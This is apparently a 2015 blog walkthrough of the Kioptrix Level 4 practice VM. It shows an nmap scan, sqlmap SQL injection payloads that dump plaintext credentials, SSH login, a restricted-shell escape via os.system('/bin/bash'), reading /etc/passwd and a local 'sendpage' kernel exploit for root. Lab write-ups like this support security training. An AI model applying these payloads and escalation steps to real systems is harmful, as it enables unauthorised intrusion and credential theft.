Friday, May 22, 2015

Kioptrix Level 4 Walkthough

This is the first in a long series of Vulnerable Virtual Machine Walkthroughs that I'll be posting to this site.By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So with out further a due, I bring you Kioptrix Level 4.


root@kali:~# nmap
Starting Nmap 6.47 ( ) at 2015-05-21 09:05 EDT
Nmap scan report for
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)

Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds

Visiting the webpage on port 80 revealed a login page which may be vulnerable to some sql injection:

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying dbms (MYSQL)
With this information I was able to specify the dmbs within my use of sqlmap Sqlmap output

root@kali:~# sqlmap -u "" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
Ultimately revealing usernames and passwords with in the underlying database
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
| id | username | password              |
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/'

[*] shutting down at 09:16:21


Now lets attempt to ssh in with john's credentials

root@kali:~# ssh john@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
john@'s password:
Connection closed by
root@kali:~# ssh john@
john@'s password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked but now we're trapped in a stupid shell..... how do we escape?

Research on how to escape this shell lead me to the following webpage:

Worked like a charm!

john:~$ echo os.system('/bin/bash')

john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now time to take a look around and escalate privilege , looks like this Linux Kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
john@Kioptrix4:~$ pwd
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see I came across lots of interesting things including mysql and nice stuff in user directories, but it was my old faithful Linux Sendpage exploit which brought home the bacon.

john@Kioptrix4:~$ ./sendpage

